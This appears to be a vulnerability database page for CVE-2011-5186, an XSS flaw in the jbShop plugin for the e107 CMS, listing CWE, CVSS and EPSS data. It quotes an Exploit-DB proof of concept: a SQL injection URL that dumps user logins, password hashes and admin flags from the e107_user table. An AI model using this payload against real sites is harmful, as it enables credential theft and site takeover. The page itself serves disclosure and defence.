CVE-2011-5186 : Detail

CVE-2011-5186

Cross-site Scripting
A03-Injection
0.17%V3
Network
2012-09-20
10h00 +00:00
2024-09-16
18h34 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in jbshop.php in the jbShop plugin for e107 7 allows remote attackers to inject arbitrary web script or HTML via the item_id parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 18056

Publication date : 2011-10-30 23h00 +00:00
Author : Robert Cooper
EDB Verified : Yes

# Exploit Title: jbShop - e107 v7 CMS plugin - SQL Injection vulnerability # Author: Robert Cooper (admin[at]websiteauditing.org) # Software Link: http://sourceforge.net/projects/jbshop/ # Tested on: [Linux/Windows 7] #Vulnerable Parameter: item_id= ############################################################## PoC: http://www.example.com//plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user-- ############################################################## www.websiteauditing.org www.areyousecure.net # Shouts to the Belegit crew

Products Mentioned

Configuraton 0

Burnsy>>Jbshop_plugin >> Version -

E107>>E107 >> Version -

References

http://www.osvdb.org/83371
Tags : vdb-entry, x_refsource_OSVDB
http://www.exploit-db.com/exploits/18056
Tags : exploit, x_refsource_EXPLOIT-DB